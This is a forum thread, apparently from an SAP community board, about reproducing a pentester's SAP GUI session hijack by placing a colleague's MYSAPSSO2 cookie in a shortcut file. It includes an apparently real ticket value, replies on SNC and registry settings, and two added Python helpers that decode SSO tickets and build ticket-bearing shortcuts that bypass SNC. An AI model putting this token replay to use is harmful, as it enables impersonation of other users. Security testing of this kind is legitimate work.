Application Development Discussions
SAP GUI session hijack

Former Member

Dears,

quite recently we've been trying to perform a SAP GUI session hijack (within our corporation, only to reproduce something that an external pentester has proved is possible). Allegedly a properly constructed SAP shortcut file including the victim's cookie is all that is needed to log on to the SAP system as the victim. So I've been asked to write a brief report and to create such a shortcut file with an additional parameter 'at' to which the victim's MYSAPSSO2 cookie value is assigned. I received the cookie value from a colleague but... a double-click on the shortcut makes me log in as... myself (instead of logging in as the colleague). Both of us have our respective users on the system below, so a missing user is not the case.

Here's what the shortcut file looks like:

[System]
Name=XXX
Description=XXX SAP XX
Client=010
[User]
Name=XXXXXXXX
at="MYSAPSSO2=AjExMDAgAA9bw3J0YWw6cGFkaXlhcnaIABNiYXNpY2F1dGhlbnRpY2F0aW9uAQAIUEFESVlBUlYCAAMwMDADAANDMVAEAAwyMDE2MDYwNzE0MzYFAAQAAAAICgAIUEFESVlBUlb%2FAQUwggEBBgkqhkiG9w0BBwKggfMwgfACAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHATGB0DCBzQIBATAiMB0xDDAKBgNVMABTA0MxUDENMAsGA1UECxMESjJFRQIDABAJBgUrDgMCGgUAoF0wGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkqhkiG9w0BCQUxDxcNMTYwNjA3MTQzNjU1WjAjBgkqhkiG9w0BCQQxFgQUu0UZjgRVxcNbqk3l8%2FA!4V5dnaUwCQYHKoZIzjgEAwQvMC0CFQCG9fWYsJm96tjNqVe6WB98ljyr4gIUftll1e6QPIa1mYFj4Sy%2FdFf2fuM%3D"
Language=EN
[Function]
Title=SAP Easy Access  -  User Menu for Xxxxxx Xxxxxxx
Command=SESSION_MANAGER
[Configuration]

I'd be grateful if you could point out what I am still missing... Is any other parameter required in the file?

Thanks in advance.
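
Before changing the shortcut it helps to know what the ticket you were handed actually says: which user, which issuing client and system, and whether its validity window has already closed. The following decoder is an added example written for this thread, not code posted by anyone in it. It walks the ticket body (one version byte, a four-character codepage, then info units of 1-byte ID, 2-byte big-endian length, value) and surfaces the fields without verifying the PKCS#7 signature, which needs the issuing system's certificate. The IDs 0x01-0x05, 0x20, 0x88 and 0xFF are documented by SAP; the other names in the table are my assumptions. The sample ticket is constructed for the example, carries a dummy signature, and would be rejected by any real system.

```python
"""Decode the info units of an SAP logon ticket (the MYSAPSSO2 cookie value).

Added example written for this thread, not code posted by anyone in it.
Ticket body layout as documented by SAP: one version byte, a 4-character
codepage, then info units of the form
    1-byte ID | 2-byte big-endian length | value
The signature unit (0xFF) is a DER-encoded PKCS#7 blob that can only be
verified with the issuing system's certificate; it is surfaced as raw bytes
and NOT verified here.
"""
import base64
import struct
import urllib.parse
from datetime import datetime, timedelta, timezone
from typing import Optional

# Info-unit IDs. 0x01-0x05, 0x20, 0x88 and 0xFF are documented by SAP;
# the names marked "assumed" come from memory of the SAP Java ticket classes.
INFO_UNIT_NAMES = {
    0x01: "user",
    0x02: "client",            # client of the ISSUING system
    0x03: "system_id",         # SID of the issuing system
    0x04: "creation_time",     # YYYYMMDDHHMM, UTC
    0x05: "valid_hours",       # 4-byte big-endian integer
    0x06: "rfc",               # assumed
    0x07: "valid_minutes",     # assumed
    0x08: "flags",             # assumed
    0x09: "language",          # assumed
    0x0A: "user_utf8",         # assumed
    0x0B: "recipient_client",  # assumed
    0x0C: "recipient_sid",     # assumed
    0x20: "portal_user",
    0x88: "auth_scheme",
    0xFF: "signature",
}


def decode_ticket(cookie_value: str) -> dict:
    """Parse a MYSAPSSO2 value as found in a cookie header or in the shortcut's
    at="MYSAPSSO2=..." line (quotes, prefix and URL-encoding are tolerated)."""
    value = cookie_value.strip().strip('"')
    if value.startswith("MYSAPSSO2="):
        value = value[len("MYSAPSSO2="):]
    value = urllib.parse.unquote(value)
    value += "=" * (-len(value) % 4)          # restore stripped base64 padding
    raw = base64.b64decode(value)
    if len(raw) < 5:
        raise ValueError("ticket too short for version byte and codepage")
    units = {}
    pos = 5
    while pos < len(raw):
        if pos + 3 > len(raw):
            raise ValueError(f"truncated info-unit header at offset {pos}")
        unit_id = raw[pos]
        (length,) = struct.unpack(">H", raw[pos + 1:pos + 3])
        pos += 3
        payload = raw[pos:pos + length]
        if len(payload) != length:
            raise ValueError(f"info unit 0x{unit_id:02x} declares {length} bytes, "
                             f"only {len(payload)} remain")
        pos += length
        name = INFO_UNIT_NAMES.get(unit_id, f"unknown_0x{unit_id:02x}")
        if unit_id in (0x05, 0x07) and length == 4:
            units[name] = struct.unpack(">I", payload)[0]
        elif unit_id == 0xFF:
            units[name] = payload                  # raw DER, not verified
        else:
            units[name] = payload.decode("utf-8", "replace")
    return {"version": raw[0], "codepage": raw[1:5].decode("ascii", "replace"), "units": units}


def expires_at(ticket: dict) -> Optional[datetime]:
    """Creation time plus declared validity, or None if the ticket lacks them."""
    units = ticket["units"]
    created = units.get("creation_time", "")
    if len(created) != 12 or not created.isdigit():
        return None
    start = datetime.strptime(created, "%Y%m%d%H%M").replace(tzinfo=timezone.utc)
    hours = units.get("valid_hours")
    minutes = units.get("valid_minutes")
    return start + timedelta(hours=hours if isinstance(hours, int) else 0,
                             minutes=minutes if isinstance(minutes, int) else 0)


def is_expired(ticket: dict, now: Optional[datetime] = None) -> bool:
    exp = expires_at(ticket)
    return exp is not None and exp <= (now or datetime.now(timezone.utc))


def build_ticket(units, codepage: bytes = b"1100") -> str:
    """Assemble an UNSIGNED ticket body (test data only, no system accepts it)."""
    body = b"\x02" + codepage
    for unit_id, payload in units:
        body += bytes([unit_id]) + struct.pack(">H", len(payload)) + payload
    return base64.b64encode(body).decode("ascii")


# Constructed sample: same field shape as the ticket in the thread, invented values.
SAMPLE_TICKET = build_ticket([
    (0x20, b"portal:victim"),
    (0x88, b"basicauthentication"),
    (0x01, b"VICTIM"),
    (0x02, b"010"),
    (0x03, b"XXX"),
    (0x04, b"201606071436"),
    (0x05, struct.pack(">I", 8)),
    (0x0A, b"VICTIM"),
    (0xFF, b"\x30\x00"),   # placeholder, not a real PKCS#7 signature
])

if __name__ == "__main__":
    t = decode_ticket(f'"MYSAPSSO2={urllib.parse.quote(SAMPLE_TICKET, safe="")}"')
    for k, v in t["units"].items():
        print(f"{k:>14}: {v.hex() if isinstance(v, bytes) else v}")
    print("expires:", expires_at(t), "| expired now:", is_expired(t))
```

Run against the value you were given (paste the whole at="..." string), the output tells you whether the ticket is still inside its validity window and which system and client issued it; both are worth confirming before hunting for missing shortcut parameters.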

2 replies

raymond_giuseppi
Active Contributor

AFAIK there are parameters (SAP GUI, Windows registry) that allow storage of such information in a shortcut; if they are not set (default), this data won't be used.

Hint: look for [HKEY_LOCAL_MACHINE\Software\Wow6432Node\SAP\SAPShortcut\Security]; there are also some security OSS notes on shortcuts to browse.

Regards,

Raymond

LutzR
Active Contributor

Hi Tomasz, this sounds like the system connection is defined using SNC (have a look at the Network tab of the connection in SAP Logon), and identity information from SNC will most probably have priority over MYSAPSSO2 information.

What you could do is define a shortcut without referring to an existing system definition, by adding

GuiParm=<connection string>

to the [System] section of your shortcut file. The connection string could look like this:

/M/myhost.mydomain.com/S/3600/G/MYLOGONGROUP

where

myhost.mydomain.com is the message server host

3600 is the message server port

MYLOGONGROUP is the logon group


Or this is something completely different: do you already have a GUI session open to that system while testing your shortcut? Then the shortcut might simply open a new window in the existing session.

Regards,

Lutz
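
To try the GuiParm approach without hand-editing the file each time, here is an added example (my code, not anything posted in the thread) that assembles a shortcut carrying its own connection string and validates that string's shape before writing it. The section and key names ([System], [User], [Function], [Configuration]; Name, Description, Client, GuiParm, Language, Title, Command, at) are the ones that appear in the thread. The /M/host/S/port/G/group form is the one given above; the /H/host/S/port direct application-server form is the same syntax for a non-load-balanced target and is included as a generalization. configparser is used only to read the file back; SAP GUI has its own parser.

```python
"""Build an SAP GUI shortcut (.sap) that carries its own GuiParm connection
string, and validate that string before the file is written.

Added example for this thread, not code posted by anyone in it. Section and
key names are the ones shown in the thread; nothing else about the shortcut
format is assumed. The /H/host/S/port form is a generalization of the
/M/.../S/.../G/... form quoted in the thread.
"""
import configparser
import re
from typing import Optional

# /M/<message server>/S/<port>/G/<logon group>   load-balanced (as in the thread)
# /H/<application server>/S/<port>               direct connection (generalization)
_MSG_SERVER = re.compile(r"^/M/(?P<host>[^/\s]+)/S/(?P<port>[^/\s]+)/G/(?P<group>[^/\s]+)$")
_APP_SERVER = re.compile(r"^/H/(?P<host>[^/\s]+)/S/(?P<port>[^/\s]+)$")


def parse_conn_string(conn: str) -> dict:
    """Split a GuiParm connection string into its parts; reject other shapes."""
    m = _MSG_SERVER.match(conn)
    if m:
        parts = {"kind": "message_server", **m.groupdict()}
    else:
        m = _APP_SERVER.match(conn)
        if not m:
            raise ValueError(f"unsupported connection string: {conn!r}")
        parts = {"kind": "app_server", **m.groupdict()}
    port = parts["port"]
    # /S/ may also carry a service name (e.g. sapmsXXX), so only numbers are range-checked
    if port.isdigit() and not 1 <= int(port) <= 65535:
        raise ValueError(f"port out of range: {port}")
    return parts


def build_shortcut(conn: str, client: str, user: str, *, name: str = "",
                   description: str = "", language: str = "EN",
                   title: str = "", command: str = "SESSION_MANAGER",
                   ticket: Optional[str] = None) -> str:
    """Return the text of a shortcut whose target comes from GuiParm rather than
    an existing SAP Logon entry. `ticket` is the optional MYSAPSSO2 value for the
    at= line the thread shows; it is written verbatim, so pass only a value you
    are entitled to use."""
    parts = parse_conn_string(conn)              # fail early on a malformed target
    if not (client.isdigit() and len(client) == 3):
        raise ValueError("client must be three digits")
    lines = [
        "[System]",
        f"Name={name or parts['host']}",
        f"Description={description}",
        f"Client={client}",
        f"GuiParm={conn}",
        "[User]",
        f"Name={user}",
    ]
    if ticket is not None:
        lines.append(f'at="MYSAPSSO2={ticket}"')
    lines += [
        f"Language={language}",
        "[Function]",
        f"Title={title}",
        f"Command={command}",
        "[Configuration]",
    ]
    return "\n".join(lines) + "\n"


def parse_shortcut(text: str) -> dict:
    """Read a shortcut back as {section: {key: value}}. Key case is preserved and
    %-interpolation is off, because ticket values contain %2F / %3D sequences.
    A present GuiParm is validated and a malformed one raises ValueError."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str
    cp.read_string(text)
    data = {section: dict(cp[section]) for section in cp.sections()}
    if "GuiParm" in data.get("System", {}):
        parse_conn_string(data["System"]["GuiParm"])
    return data


if __name__ == "__main__":
    target = "/M/myhost.mydomain.com/S/3600/G/MYLOGONGROUP"
    shortcut = build_shortcut(target, "010", "XXXXXXXX", name="XXX",
                              description="XXX SAP XX",
                              title="SAP Easy Access  -  User Menu for Xxxxxx Xxxxxxx")
    print(shortcut)
    print(parse_conn_string(parse_shortcut(shortcut)["System"]["GuiParm"]))
```

Write the returned text to a file with the .sap extension and double-click it as you did with the original; because the target is now inside the file, whatever SNC settings the SAP Logon entry carries no longer apply to this connection.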